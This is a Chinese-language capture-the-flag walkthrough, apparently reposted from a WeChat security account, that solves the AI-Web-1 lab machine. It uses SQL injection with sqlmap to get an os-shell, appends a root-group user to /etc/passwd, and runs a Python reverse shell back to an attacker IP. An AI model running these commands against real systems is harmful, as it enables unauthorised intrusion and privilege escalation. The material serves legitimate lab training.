AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】

admin 2024年8月3日14:29:20评论10 views字数 2856阅读9分31秒阅读模式

前言

通过百度网盘分享的文件:AI-Web-1.0.7z链接:https://pan.baidu.com/s/1voirxgYnQGaZeTTDzwKQZQ?pwd=1212 提取码:1212 --来自百度网盘超级会员V4的分享

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802143536876

下载之后设置为nat模式

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802134452085

启动即可,不需要登录

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802134504398

靶机复现

主机发现

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802142459830

访问即可

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802135046689

信息收集robots.txt文件

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131537718

访问尝试,原来是什么也没有的,404

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131634434

我们去访问这个上级目录,发现有一个id

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131725462

注入测试

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131805580

语法错误,存在sql注入漏洞

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131758770

抓包

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131923201

sqlmap

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131955344

爆表

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802132045654

发现表里什么也没有,换思路

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802132322476

没有权限

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802132333392

dirb扫一下看看,有一个info.php

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802132418449

网站绝对路径

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802102310051

禁用的函数,没有禁用eval

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802102330233

本地文件包含开启,以及php版本(%00截断,低于5.2),但似乎没什么用

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802102413674

这里我们有两种方法

方式一

通过查找secure_file_priv 的值

1、DBA权限,这里我们发现可以对文件进行读写

sqlmap -u 'http://10.0.0.84/se3reTdir777/#' -data "uid=1&Operation=%E6%8F%90%E4%BA%A4" -p 'uid' --privileges
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802133048751

2、secure_file_priv

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802103137489
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802103735767

方式二

从phpinfo中的网站绝对路径进行拼接尝试

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802104005173
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802103844650
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131255632

有了绝对允许上传文件的角度路径那么我们就能使用sqlmap获取shell

sqlmap获取shell

使用sqlmap的oshell

osshell原理

通过sqlmap -v 5 参数可以查看流量包

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802104556564

通过分析,得到sqlmap的osshell原理就是,通过into outfile/into dumpfile写文件的方式进行文件写入

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802104629208

然后再进行访问这个上传的写入

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802104842231

sqlmap会向这个上传的网站目录写入两个文件

1、文件上传木马文件

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802105002453
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802105327076

2、命令执行文件

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802105104933

文件上传成功后,即可执行命令(与蚁剑不兼容)

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802105247675

注意:如果你退出了这个osshell,那么这两个文件都会自动删除,导致执行不了命令

这是会话维持中,可以执行命令

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802130941177

会话断开

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802105431966

断开后尝试执行命令

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802131009445

上传成功后,没有找到这个flag.txt文件,应该是没有权限读取

10=system('find / -name flag*');
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802111914541

查看/etc/passwd权限,发现漏洞,竟然可以读写文件,我们追加一个用户

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802114512582

新加用户之前创建一个登录密码

perl -le 'print crypt("123456","addedsalt")'
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802114920192

新加一个用户,分到root组进行提权

echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802114841607

靶机发现还有nc

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802115137650

反弹shell,查看攻击机ip地址

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802112206063

靶机nc发现没有-e参数,反弹不了shell

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802121408943

看看靶机有没有python

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802121454467

很好,有python,我们使用python反弹shell,攻击机开启监听

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802121545185

中间我断网了,ip地址变了一下,之后操作都是这个ip

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802121757867

我们尝试使用python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.7',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802125842841

如果没有成功,就多试几次

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802125822206

我们尝试切换用户,提示必须从终端运行

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802121900053

这个问题搞我半天,后来发现可以使用python调用本地shell即终端升级

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

su test
123456
AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802130105974

模糊查找flag的位置

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802130600388

cat 即可

AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】
image-20240802130206310

感谢观看!网安交流群,后台菜单栏获取。

原文始发于微信公众号(小羽网安):AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月3日14:29:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AIWEB1综合靶场,从外网打到内网通关教程【附靶场环境】https://cn-sec.com/archives/3029257.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息